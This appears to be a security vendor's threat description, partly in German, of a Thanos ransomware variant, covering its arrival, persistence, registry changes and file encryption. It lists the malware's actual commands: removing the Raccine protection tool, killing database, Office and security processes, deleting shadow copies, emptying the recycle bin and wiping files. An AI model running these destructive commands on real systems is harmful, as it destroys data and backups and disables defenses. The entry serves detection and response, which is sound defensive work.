Ransom.MSIL.THANOS.THFOFBB

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Löscht Dateien, so dass Programme und Anwendungen nicht ordnungsgemäß ausgeführt werden.

Übertragungsdetails

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

Fügt die folgenden Prozesse hinzu:

• taskkill /F /IM RaccineSettings.exe
• reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
• reg delete HKCU\Software\Raccine /F
• schtasks /DELETE /TN "Raccine Rules Updater" /F
• cmd.exe /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
• Sc.exe config Dnscache start= auto
• Sc.exe config FDResPub start= auto
• Sc.exe config SSDPSRV start= auto
• Sc.exe config upnphost start= auto
• Sc.exe config SQLTELEMETRY start= disabled
• Sc.exe config SQLTELEMETRY$ECWDB2 start= disabled
• Sc.exe config SQLWriter start= disabled
• Sc.exe config SstpSvc start= disabled
• taskkill.exe /IM mspub.exe /F
• taskkill.exe /IM mydesktopqos.exe /F
• taskkill.exe /IM mydesktopservice.exe /F
• taskkill.exe /IM mysqld.exe /F
• taskkill.exe /IM sqbcoreservice.exe /F
• taskkill.exe /IM firefoxconfig.exe /F
• taskkill.exe /IM agntsvc.exe /F
• taskkill.exe /IM thebat.exe /F
• taskkill.exe /IM steam.exe /F
• taskkill.exe /IM encsvc.exe /F
• taskkill.exe /IM excel.exe /F
• taskkill.exe /IM CNTAoSMgr.exe /F
• taskkill.exe /IM sqlwriter.exe /F
• taskkill.exe /IM tbirdconfig.exe /F
• taskkill.exe /IM dbeng50.exe /F
• taskkill.exe /IM thebat64.exe /F
• taskkill.exe /IM ocomm.exe /F
• taskkill.exe /IM infopath.exe /F
• taskkill.exe /IM mbamtray.exe /F
• taskkill.exe /IM zoolz.exe /F
• taskkill.exe /IM thunderbird.exe /F
• taskkill.exe /IM dbsnmp.exe /F
• taskkill.exe /IM xfssvccon.exe /F
• taskkill.exe /IM mspub.exe /F
• taskkill.exe /IM Ntrtscan.exe /F
• taskkill.exe /IM isqlplussvc.exe /F
• taskkill.exe /IM onenote.exe /F
• taskkill.exe /IM PccNTMon.exe /F
• taskkill.exe /IM msaccess.exe /F
• taskkill.exe /IM outlook.exe /F
• taskkill.exe /IM tmlisten.exe /F
• taskkill.exe /IM msftesql.exe /F
• taskkill.exe /IM powerpnt.exe /F
• taskkill.exe /IM mydesktopqos.exe /F
• taskkill.exe /IM visio.exe /F
• taskkill.exe /IM mydesktopservice.exe /F
• taskkill.exe /IM winword.exe /F
• taskkill.exe /IM mysqld-nt.exe /F
• taskkill.exe /IM wordpad.exe /F
• taskkill.exe /IM mysqld-opt.exe /F
• taskkill.exe /IM ocautoupds.exe /F
• taskkill.exe /IM ocssd.exe /F
• taskkill.exe /IM oracle.exe /F
• taskkill.exe /IM sqlagent.exe /F
• taskkill.exe /IM sqlbrowser.exe /F
• taskkill.exe IM sqlservr.exe /F
• taskkill.exe /IM synctime.exe /F
• powershell.exe & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
• notepad.exe %Desktop%\RESTORE_FILES_INFO.txt
• cmd.exe /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
• cmd.exe "/C choice /C Y /N /D Y /T 3 & Del "{Malware Path}\{Malware Filename}.exe

(Hinweis: %Desktop% ist der Ordner 'Desktop' für den aktuellen Benutzer, normalerweise C:\Windows\Profile\{Benutzername}\Desktop unter Windows 98 und ME, C:\WINNT\Profile\{Benutzername}\Desktop unter Windows NT, C:\Dokumente und Einstellungen\{Benutzername}\Desktop unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{Benutzername}\Desktop unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).)

Fügt die folgenden Mutexe hinzu, damit nur jeweils eine ihrer Kopien ausgeführt wird:

• Global\8a3cd836-e8bb-428d-9e0b-d62e18cfe2d4

Autostart-Technik

Schleust die folgenden Dateien in den benutzerspezifischen Autostart-Ordner von Windows ein, um sich selbst bei jedem Systemstart auszuführen.

• %Programs%\Startup\reload1.lnk

Andere Systemänderungen

Löscht die folgenden Dateien:

• {Malware Path}\Config.enc

Fügt die folgenden Registrierungseinträge hinzu:

HKEY_CURRENT_USER\Software\KEYID\
myKeyID
ID1 = {Random}

Ändert die folgenden Registrierungseinträge:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
Control\FileSystem
LongPathsEnabled = 1

Prozessbeendigung

Beendet die folgenden Prozesse, wenn sie im Speicher des betroffenen Systems ausgeführt werden:

• http analyzer stand-alone
• fiddler
• effetech http sniffer
• firesheep
• IEWatch Professional
• dumpcap
• wireshark
• wireshark portable
• sysinternals tcpview
• NetworkMiner
• NetworkTrafficView
• HTTPNetworkSniffer
• tcpdump
• intercepter
• Intercepter-NG
• ollydbg
• x64dbg
• x32dbg
• dnspy
• dnspy-x86
• de4dot
• ilspy
• dotpeek
• dotpeek64
• ida64
• RDG Packer Detector
• CFF Explorer
• PEiD
• protection_id
• LordPE
• pe-sieve
• MegaDumper
• UnConfuserEx
• Universal_Fixer
• NoFuserEx
• cheatengine

Andere Details

Es macht Folgendes:

• It encrypts all available drives (except for CDROMs).
• It empties the recycle bin.
• It deletes the following subkeys under {HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options}
  • vssadmin.exe
  • wmic.exe
  • wbadmin.exe
  • bcdedit.exe
  • powershell.exe
  • diskshadow.exe
  • net.exe